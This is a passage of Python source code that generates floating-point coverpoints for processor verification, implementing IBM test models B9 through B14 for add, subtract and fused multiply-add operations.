rs2_sgn = rs1_sgn
rs2_exp = rs1_exp
rs2_man = '1'*j + '0'*(len(rs1_man)-j) # Long sequence of 1s
rs2 = fields_dec_converter(32,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b9_comb.append((floatingPoint_tohex(flen,rs2),))
comment.append(' | Long sequence of ones ---> rs1_man = '+rs2_man)
rs2_man = '0'*j + '1'*(len(rs1_man)-j) # Long sequence of 0s
rs2 = fields_dec_converter(32,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b9_comb.append((floatingPoint_tohex(flen,rs2),))
comment.append(' | Long sequence of zeroes ---> rs1_man = '+rs2_man)
chkrbrd = ['011','110','0011','1100','0111','1000','010','101','0110','1001']
for j in chkrbrd:
rs2_sgn = rs1_sgn
rs2_exp = rs1_exp
rs2_man = j
for k in range(math.ceil(len(rs1_man)/len(j))):
rs2_man += j
rs2_man = rs2_man[0:flen-e_sz-1]
rs2 = fields_dec_converter(32,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b9_comb.append((floatingPoint_tohex(flen,rs2),))
comment.append(' | Checkerboard pattern ---> rs1_man = '+rs2_man)
coverpoints = []
k = 0
for c in b9_comb:
cvpt = ""
for x in range(1, ops+1):
# cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
cvpt += (extract_fields(flen,c[x-1],str(x)))
cvpt += " and "
cvpt += 'rm_val == 0'
cvpt += ' # '
for y in range(1, ops+1):
cvpt += 'rs'+str(y)+'_val=='
cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
if(y != ops):
cvpt += " and "
cvpt += comment[k]
coverpoints.append(cvpt)
k += 1
mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
(str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B9 for '+opcode+' !'
logger.info(mess)
coverpoints = comments_parser(coverpoints)
return coverpoints
def ibm_b10(flen, opcode, ops, N=-1, seed=-1):
'''
IBM Model B10 Definition:
This model tests every possible value for a shift between the input operands.
1. A value smaller than -(p + 4)
2. All the values in the range [-(p + 4) , (p + 4)]
3. A value larger than (p + 4)
:param flen: Size of the floating point registers
:param opcode: Opcode for which the coverpoints are to be generated
:param ops: No. of Operands taken by the opcode
:param N: No. of sets of coverpoints to be generated. (Predefined to -1. Set to 2)
:param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)
:type flen: int
:type opcode: str
:type ops: int
:type N: int
:param seed: int
Abstract Dataset Description:
Operand1 = [Random Number]
Operand2 = [A value smaller than -(op1.exp+4), All values in the range [-(op1.exp+4), (op1.exp+4)], A value larger than +(op1.exp+4)]
Implementation:
- The exponent values of operand 1 and operand 2 obey the shift defined above. The mantissa value is randomly chosen and appended with the exponent derived.
- Simultaneously, we convert these numbers into their corresponding IEEE754 floating point formats.
- These operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
- Coverpoints are then appended with rounding mode ‘0’ for that particular opcode.
'''
opcode = opcode.split('.')[0]
if flen == 32:
ieee754_maxnorm = '0x1.7fffffp+127'
maxnum = float.fromhex(ieee754_maxnorm)
exp_max = 255
elif flen == 64:
maxdec = '1.7976931348623157e+308'
maxnum = float.fromhex('0x1.fffffffffffffp+1023')
exp_max = 1023
if N == -1:
N = 2
if seed == -1:
if opcode in 'fadd':
random.seed(0)
elif opcode in 'fsub':
random.seed(1)
else:
random.seed(seed)
b10_comb = []
comment = []
for i in range(1,N):
rs1 = random.uniform(1,maxnum/1000)
rs2 = random.uniform(1,maxnum/1000)
rs1_exp = str(rs1).split('e')[1]
rs2_exp = -1*random.randrange(int(math.log(pow(10,int(rs1_exp)),2))+4, exp_max)
rs2_num = str(rs2).split('e')[0] + 'e' + str(int(math.log(pow(2,int(rs2_exp)),10)))
b10_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2_num))))
comment.append(' | Exponent = '+ str(rs2_exp) + ' --> A value smaller than -(p + 4)')
for j in range(-(int(math.log(pow(10,int(rs1_exp)),2))+4),+(int(math.log(pow(10,int(rs1_exp)),2))+4)):
rs2_num = str(rs2).split('e')[0] + 'e' + str(int(math.log(pow(2,int(j)),10)))
b10_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2_num))))
comment.append(' | Exponent = '+ str(j) + ' --> Values in the range [-(p + 4) , (p + 4)]')
rs2_exp = random.randrange(int(math.log(pow(10,int(rs1_exp)),2))+4, exp_max)
rs2_num = str(rs2).split('e')[0] + 'e' + str(int(math.log(pow(2,int(rs2_exp)),10)))
b10_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2_num))))
comment.append(' | Exponent = '+ str(rs2_exp) + ' --> A value larger than (p + 4)')
coverpoints = []
k = 0
for c in b10_comb:
cvpt = ""
for x in range(1, ops+1):
# cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
cvpt += (extract_fields(flen,c[x-1],str(x)))
cvpt += " and "
cvpt += 'rm_val == 0'
cvpt += ' # '
for y in range(1, ops+1):
cvpt += 'rs'+str(y)+'_val=='
cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
if(y != ops):
cvpt += " and "
cvpt += comment[k]
coverpoints.append(cvpt)
k += 1
mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
(str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B10 for '+opcode+' !'
logger.info(mess)
coverpoints = comments_parser(coverpoints)
return coverpoints
def ibm_b11(flen, opcode, ops, N=-1, seed=-1):
'''
IBM Model B11 Definition:
In this model we test the combination of different shift values between the
inputs, with special patterns in the significands of the inputs.
Significands of Input1 and Input2: as in model (B9) "Special Significands on
Inputs"
Shift: as in model (B10) "Shift - Add"
We test both effective operations: addition and subtraction.
:param flen: Size of the floating point registers
:param opcode: Opcode for which the coverpoints are to be generated
:param ops: No. of Operands taken by the opcode
:param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)
:type flen: int
:type opcode: str
:type ops: int
:param seed: int
Abstract Dataset Description:
Operand1, Operand2 ∈ Abstract Dataset in B9 + Abstract Dataset in B10
Implementation:
- A culmination of the techniques used in the implementations of Model B9 and Model B10 are used to form the dataset.
- The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
- Coverpoints are then appended with all rounding modes for that particular opcode.
'''
opcode = opcode.split('.')[0]
if flen == 32:
flip_types = fzero + fone + fminsubnorm + fmaxsubnorm + fminnorm + fmaxnorm
e_sz=8
exp_max = 255
elif flen == 64:
flip_types = dzero + done + dminsubnorm + dmaxsubnorm + dminnorm + dmaxnorm
e_sz=11
exp_max = 1023
if seed == -1:
if opcode in 'fadd':
random.seed(0)
elif opcode in 'fsub':
random.seed(1)
else:
random.seed(seed)
rs1 = []
b11_comb = []
comment = []
if ops == 2:
for i in range(len(flip_types)):
rs1.append(flip_types[i])
for i in range(len(rs1)):
bin_val = bin(int('1'+rs1[i][2:],16))[3:]
rs1_sgn = bin_val[0]
rs1_exp = bin_val[1:e_sz+1]
rs1_man = bin_val[e_sz+1:]
if int(rs1_exp,2) < 4: rs2_exp = -127
else : rs2_exp = random.randrange(-127,int(rs1_exp,2)-131)
comment_str = ' | Exponent = '+ str(rs2_exp) + ' --> A value smaller than (p - 4)'
rs2_exp += 127
if flen == 32: rs2_exp = '{:08b}'.format(rs2_exp)
elif flen == 64: rs2_exp = '{:011b}'.format(rs2_exp)
for j in range(len(rs1_man)):
rs2_sgn = rs1_sgn
rs2_man = '0'*j + rs1_man[j:] # Leading 0s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
comment.append(comment_str + ' | Leading zeroes ---> rs2_man = '+rs2_man)
b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
comment.append(comment_str + ' | Leading zeroes ---> rs1_man = '+rs2_man)
rs2_man = '1'*j + '0'*(len(rs1_man)-j) # Leading 1s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
comment.append(comment_str + ' | Leading ones ---> rs2_man = '+rs2_man)
b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
comment.append(comment_str + ' | Leading ones ---> rs1_man = '+rs2_man)
rs2_man = rs1_man[0:j] + '0'*(len(rs1_man)-j) # Trailing 0s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
comment.append(comment_str + ' | Trailing zeroes ---> rs2_man = '+rs2_man)
b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
comment.append(comment_str + ' | Trailing zeroes ---> rs1_man = '+rs2_man)
rs2_man = '0'*j + '1'*(len(rs1_man)-j) # Trailing 1s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
comment.append(comment_str + ' | Trailing ones ---> rs2_man = '+rs2_man)
b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
comment.append(comment_str + ' | Trailing ones ---> rs1_man = '+rs2_man)
for j in range(len(rs1_man)-math.ceil(0.1*len(rs1_man)),len(rs1_man)):
rs2_sgn = rs1_sgn
rs2_exp = rs1_exp
rs2_man = '1'*j + '0'*(len(rs1_man)-j) # Long sequence of 1s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
comment.append(comment_str + ' | Long sequence of ones ---> rs2_man = '+rs2_man)
b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
comment.append(comment_str + ' | Long sequence of ones ---> rs1_man = '+rs2_man)
rs2_man = '0'*j + '1'*(len(rs1_man)-j) # Long sequence of 0s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
comment.append(comment_str + ' | Long sequence of zeroes ---> rs2_man = '+rs2_man)
b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
comment.append(comment_str + ' | Long sequence of zeroes ---> rs1_man = '+rs2_man)
chkrbrd = ['011','110','0011','1100','0111','1000','010','101','0110','1001']
for j in chkrbrd:
rs2_sgn = rs1_sgn
rs2_exp = rs1_exp
rs2_man = j
for k in range(math.ceil(len(rs1_man)/len(j))):
rs2_man += j
rs2_man = rs2_man[0:flen-e_sz-1]
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
comment.append(comment_str + ' | Checkerboard pattern ---> rs2_man = '+rs2_man)
b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
comment.append(comment_str + ' | Checkerboard pattern ---> rs1_man = '+rs2_man)
if int(rs1_exp,2) >= 250: rs2_exp = 127
else : rs2_exp = random.randrange(int(rs1_exp,2)-123,127)
comment_str = ' | Exponent = '+ str(rs2_exp) + ' --> A value greater than (p + 4)'
rs2_exp += 127
if flen == 32: rs2_exp = '{:08b}'.format(rs2_exp)
elif flen == 64: rs2_exp = '{:011b}'.format(rs2_exp)
for j in range(len(rs1_man)):
rs2_sgn = rs1_sgn
rs2_man = '0'*j + rs1_man[j:] # Leading 0s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
comment.append(comment_str + ' | Leading zeroes ---> rs2_man = '+rs2_man)
b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
comment.append(comment_str + ' | Leading zeroes ---> rs1_man = '+rs2_man)
rs2_man = '1'*j + '0'*(len(rs1_man)-j) # Leading 1s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
comment.append(comment_str + ' | Leading ones ---> rs2_man = '+rs2_man)
b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
comment.append(comment_str + ' | Leading ones ---> rs1_man = '+rs2_man)
rs2_man = rs1_man[0:j] + '0'*(len(rs1_man)-j) # Trailing 0s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
comment.append(comment_str + ' | Trailing zeroes ---> rs2_man = '+rs2_man)
b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
comment.append(comment_str + ' | Trailing zeroes ---> rs1_man = '+rs2_man)
rs2_man = '0'*j + '1'*(len(rs1_man)-j) # Trailing 1s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
comment.append(comment_str + ' | Trailing ones ---> rs2_man = '+rs2_man)
b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
comment.append(comment_str + ' | Trailing ones ---> rs1_man = '+rs2_man)
for j in range(len(rs1_man)-math.ceil(0.1*len(rs1_man)),len(rs1_man)):
rs2_sgn = rs1_sgn
rs2_exp = rs1_exp
rs2_man = '1'*j + '0'*(len(rs1_man)-j) # Long sequence of 1s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
comment.append(comment_str + ' | Long sequence of ones ---> rs2_man = '+rs2_man)
b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
comment.append(comment_str + ' | Long sequence of ones ---> rs1_man = '+rs2_man)
rs2_man = '0'*j + '1'*(len(rs1_man)-j) # Long sequence of 0s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
comment.append(comment_str + ' | Long sequence of zeroes ---> rs2_man = '+rs2_man)
b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
comment.append(comment_str + ' | Long sequence of zeroes ---> rs1_man = '+rs2_man)
chkrbrd = ['011','110','0011','1100','0111','1000','010','101','0110','1001']
for j in chkrbrd:
rs2_sgn = rs1_sgn
rs2_exp = rs1_exp
rs2_man = j
for k in range(math.ceil(len(rs1_man)/len(j))):
rs2_man += j
rs2_man = rs2_man[0:flen-e_sz-1]
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
comment.append(comment_str + ' | Checkerboard pattern ---> rs2_man = '+rs2_man)
b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
comment.append(comment_str + ' | Checkerboard pattern ---> rs1_man = '+rs2_man)
ul = int(rs1_exp,2)-123
ll = int(rs1_exp,2)-131
if int(rs1_exp,2) >= 250: ul = 127
if int(rs1_exp,2) < 4: ll = -127
for expval in range (ll, ul):
rs2_exp = expval
comment_str = ' | Exponent = '+ str(rs2_exp) + ' --> Values in the range (p - 4) to (p + 4)'
rs2_exp += 127
if flen == 32: rs2_exp = '{:08b}'.format(rs2_exp)
elif flen == 64: rs2_exp = '{:011b}'.format(rs2_exp)
for j in range(len(rs1_man)):
rs2_sgn = rs1_sgn
rs2_man = '0'*j + rs1_man[j:] # Leading 0s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
comment.append(comment_str + ' | Leading zeroes ---> rs2_man = '+rs2_man)
b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
comment.append(comment_str + ' | Leading zeroes ---> rs1_man = '+rs2_man)
rs2_man = '1'*j + '0'*(len(rs1_man)-j) # Leading 1s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
comment.append(comment_str + ' | Leading ones ---> rs2_man = '+rs2_man)
b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
comment.append(comment_str + ' | Leading ones ---> rs1_man = '+rs2_man)
rs2_man = rs1_man[0:j] + '0'*(len(rs1_man)-j) # Trailing 0s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
comment.append(comment_str + ' | Trailing zeroes ---> rs2_man = '+rs2_man)
b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
comment.append(comment_str + ' | Trailing zeroes ---> rs1_man = '+rs2_man)
rs2_man = '0'*j + '1'*(len(rs1_man)-j) # Trailing 1s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
comment.append(comment_str + ' | Trailing ones ---> rs2_man = '+rs2_man)
b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
comment.append(comment_str + ' | Trailing ones ---> rs1_man = '+rs2_man)
for j in range(len(rs1_man)-math.ceil(0.1*len(rs1_man)),len(rs1_man)):
rs2_sgn = rs1_sgn
rs2_exp = rs1_exp
rs2_man = '1'*j + '0'*(len(rs1_man)-j) # Long sequence of 1s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
comment.append(comment_str + ' | Long sequence of ones ---> rs2_man = '+rs2_man)
b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
comment.append(comment_str + ' | Long sequence of ones ---> rs1_man = '+rs2_man)
rs2_man = '0'*j + '1'*(len(rs1_man)-j) # Long sequence of 0s
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
comment.append(comment_str + ' | Long sequence of zeroes ---> rs2_man = '+rs2_man)
b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
comment.append(comment_str + ' | Long sequence of zeroes ---> rs1_man = '+rs2_man)
chkrbrd = ['011','110','0011','1100','0111','1000','010','101','0110','1001']
for j in chkrbrd:
rs2_sgn = rs1_sgn
rs2_exp = rs1_exp
rs2_man = j
for k in range(math.ceil(len(rs1_man)/len(j))):
rs2_man += j
rs2_man = rs2_man[0:flen-e_sz-1]
rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
comment.append(comment_str + ' | Checkerboard pattern ---> rs2_man = '+rs2_man)
b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
comment.append(comment_str + ' | Checkerboard pattern ---> rs1_man = '+rs2_man)
coverpoints = []
k = 0
for c in b11_comb:
cvpt = ""
for x in range(1, ops+1):
# cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
cvpt += (extract_fields(flen,c[x-1],str(x)))
cvpt += " and "
cvpt += 'rm_val == 0'
cvpt += ' # '
for y in range(1, ops+1):
cvpt += 'rs'+str(y)+'_val=='
cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
if(y != ops):
cvpt += " and "
cvpt += comment[k]
coverpoints.append(cvpt)
k += 1
mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
(str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B11 for '+opcode+' !'
logger.info(mess)
coverpoints = comments_parser(coverpoints)
return coverpoints
def ibm_b12(flen, opcode, ops, seed=-1):
'''
IBM Model B12 Definition:
This model tests every possible value for cancellation.
For the difference between the exponent of the intermediate result and the
maximum between the exponents of the inputs, test all values in the range:
[-p, +1].
:param flen: Size of the floating point registers
:param opcode: Opcode for which the coverpoints are to be generated
:param ops: No. of Operands taken by the opcode
:param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)
:type flen: int
:type opcode: str
:type ops: int
:param seed: int
Abstract Dataset Description:
Intermediate Result - Operand.Exp ∈ [-p, +1]
Operand1 {operation} Operand2 = Intermediate Results
Implementation:
- The exponent values of operand 1 and operand 2 obey the shift defined above. The mantissa value is randomly chosen and appended with the exponent derived.
- Simultaneously, we convert these numbers into their corresponding IEEE754 floating point formats.
- These operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
- Coverpoints are then appended with rounding mode ‘0’ for that particular opcode.
'''
opcode = opcode.split('.')[0]
getcontext().prec = 40
if flen == 32:
ieee754_maxnorm = '0x1.7fffffp+127'
maxnum = float.fromhex(ieee754_maxnorm)
ieee754_minsubnorm = '0x0.000001p-126'
minsubnorm = float.fromhex(ieee754_minsubnorm)
ieee754_maxsubnorm = '0x0.7fffffp-126'
maxsubnorm = float.fromhex(ieee754_maxsubnorm)
elif flen == 64:
ieee754_maxnorm = '0x1.fffffffffffffp+1023'
maxnum = float.fromhex(ieee754_maxnorm)
ieee754_minsubnorm = '0x0.0000000000001p-1022'
minsubnorm = float.fromhex(ieee754_minsubnorm)
ieee754_maxsubnorm = '0x0.fffffffffffffp-1022'
maxsubnorm = float.fromhex(ieee754_maxsubnorm)
if seed == -1:
if opcode in 'fadd':
random.seed(0)
elif opcode in 'fsub':
random.seed(1)
else:
random.seed(seed)
b12_comb = []
for i in range(50):
if opcode in 'fadd': rs1 = -1*random.uniform(minsubnorm,maxnum)
elif opcode in 'fsub': rs1 = random.uniform(minsubnorm,maxnum)
ir = random.uniform(1,maxnum)
if opcode in 'fadd':
if flen == 32:
rs2 = ir - rs1
elif flen == 64:
rs2 = Decimal(ir) - Decimal(rs1)
elif opcode in 'fsub':
if flen == 32:
rs2 = rs1 - ir
elif flen == 64:
rs2 = Decimal(rs1) - Decimal(ir)
if(flen==32):
x1 = struct.unpack('f', struct.pack('f', rs1))[0]
x2 = struct.unpack('f', struct.pack('f', rs2))[0]
elif(flen==64):
x1 = rs1
x2 = rs2
if opcode in ['fadd','fsub']:
b12_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2))))
coverpoints = []
comment = ' | Add: Cancellation'
for c in b12_comb:
cvpt = ""
for x in range(1, ops+1):
# cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
cvpt += (extract_fields(flen,c[x-1],str(x)))
cvpt += " and "
cvpt += 'rm_val == 0'
cvpt += ' # '
for y in range(1, 3):
cvpt += 'rs'+str(y)+'_val=='
cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
if(y != ops):
cvpt += " and "
cvpt += comment
coverpoints.append(cvpt)
mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
(str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B12 for '+opcode+' !'
logger.info(mess)
coverpoints = comments_parser(coverpoints)
return coverpoints
def ibm_b13(flen, opcode, ops, seed=-1):
'''
IBM Model B13 Definition:
This model tests all combinations of cancellation values as in model (B12), with
all possible unbiased exponent values of subnormal results.
:param flen: Size of the floating point registers
:param opcode: Opcode for which the coverpoints are to be generated
:param ops: No. of Operands taken by the opcode
:param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)
:type flen: int
:type opcode: str
:type ops: int
:param seed: int
Abstract Dataset Description:
Intermediate Result - Operand.Exp ∈ [-p, +1] (The exponent for the intermediate result is chosen such that it is a subnormal number)
Operand1 {operation} Operand2 = Intermediate Results
Implementation:
- The implementation procedure for Model B12 is repeated with a revised exponent range as defined above.
- The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
- Coverpoints are then appended with all rounding modes for that particular opcode.
'''
opcode = opcode.split('.')[0]
getcontext().prec = 40
if flen == 32:
ieee754_maxnorm = '0x1.7fffffp+127'
maxnum = float.fromhex(ieee754_maxnorm)
ieee754_minsubnorm = '0x0.000001p-126'
minsubnorm = float.fromhex(ieee754_minsubnorm)
ieee754_maxsubnorm = '0x0.7fffffp-126'
maxsubnorm = float.fromhex(ieee754_maxsubnorm)
elif flen == 64:
ieee754_maxnorm = '0x1.fffffffffffffp+1023'
maxnum = float.fromhex(ieee754_maxnorm)
ieee754_minsubnorm = '0x0.0000000000001p-1022'
minsubnorm = float.fromhex(ieee754_minsubnorm)
ieee754_maxsubnorm = '0x0.fffffffffffffp-1022'
maxsubnorm = float.fromhex(ieee754_maxsubnorm)
if seed == -1:
if opcode in 'fadd':
random.seed(0)
elif opcode in 'fsub':
random.seed(1)
else:
random.seed(seed)
b13_comb = []
for i in range(200):
rs1 = random.uniform(minsubnorm,maxnum)
ir = random.uniform(minsubnorm,maxsubnorm)
if opcode in 'fadd':
if flen == 32:
rs2 = ir - rs1
elif flen == 64:
rs2 = Decimal(ir) - Decimal(rs1)
elif opcode in 'fsub':
if flen == 32:
rs2 = rs1 - ir
elif flen == 64:
rs2 = Decimal(rs1) - Decimal(ir)
if(flen==32):
x1 = struct.unpack('f', struct.pack('f', rs1))[0]
x2 = struct.unpack('f', struct.pack('f', rs2))[0]
elif(flen==64):
x1 = rs1
x2 = rs2
if opcode in ['fadd','fsub']:
b13_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2))))
coverpoints = []
comment = ' | Add: Cancellation ---> Subnormal result'
for c in b13_comb:
cvpt = ""
for x in range(1, 3):
# cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
cvpt += (extract_fields(flen,c[x-1],str(x)))
cvpt += " and "
cvpt += 'rm_val == 0'
cvpt += ' # '
for y in range(1, ops+1):
cvpt += 'rs'+str(y)+'_val=='
cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
if(y != ops):
cvpt += " and "
cvpt += comment
coverpoints.append(cvpt)
mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
(str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B13 for '+opcode+' !'
logger.info(mess)
coverpoints = comments_parser(coverpoints)
return coverpoints
def ibm_b14(flen, opcode, ops, N=-1, seed=-1):
'''
IBM Model B14 Definition:
This model tests every possible value for a shift between the addends of the multiply-add operation.
For the difference between the unbiased exponent of the addend and the
unbiased exponent of the result of the multiplication, test the following values:
1. A value smaller than -(2* p + 1)
2. All the values in the range [-(2*p +1), (p +1) ]
3. A value larger than (p + 1)
We test both effective operations: addition and subtraction. The end values tested are selected to be greater by one than the largest possible shift in which
the smaller addend may affect the result.
:param flen: Size of the floating point registers
:param opcode: Opcode for which the coverpoints are to be generated
:param ops: No. of Operands taken by the opcode
:param N: No. of sets of coverpoints to be generated. (Predefined to -1. Set to 2)
:param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)
:type flen: int
:type opcode: str
:type ops: int
:type N: int
:param seed: int
Abstract Dataset Description:
Shift between the addends of the multiply-add operation = [ A value smaller than -(2* p + 1), All the values in the range [-(2*p +1), (p +1), A value larger than (p + 1) ] → Condition 1
Operand 1, 2 = Random
Operand 3 = Condition 1
Implementation:
- The shift between the two addends are constrained by the conditions mentioned in the dataset above.
- Operands 1 and 2 are randomly obtained. But Operand 3 is obtained by ensuring the shift conditions.
- Once the dataset is formed, these operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
- Coverpoints are then appended with rounding mode ‘0’ for that particular opcode.
'''
opcode = opcode.split('.')[0]
if flen == 32:
ieee754_maxnorm = '0x1.7fffffp+127'
maxnum = float.fromhex(ieee754_maxnorm)
exp_max = 127
mant_bits = 23
limnum = maxnum
elif flen == 64:
maxdec = '1.7976931348623157e+308'
maxnum = float.fromhex('0x1.fffffffffffffp+1023')
exp_max = 1022
ieee754_limnum = '0x1.fffffffffffffp+507'
mant_bits = 52
limnum = float.fromhex(ieee754_limnum)
if N == -1:
N = 2
if seed == -1:
if opcode in 'fmadd':
random.seed(0)
elif opcode in 'fmsub':
random.seed(1)
elif opcode in 'fnmadd':
random.seed(2)
elif opcode in 'fnmsub':
random.seed(3)
else:
random.seed(seed)
b14_comb = []
comment = []
for i in range(1,N):
rs1 = random.uniform(1,limnum)
rs2 = random.uniform(1,limnum)
rs3 = random.uniform(1,limnum)
mul_exp = int(str(rs1*rs2).split('e')[1])
mul_exp = int(math.log(pow(2,int(mul_exp)),10))
if mul_exp-((2*mant_bits)+1) > -1*exp_max:
rs3_exp = random.randrange(-1*exp_max,mul_exp-((2*mant_bits)+1))
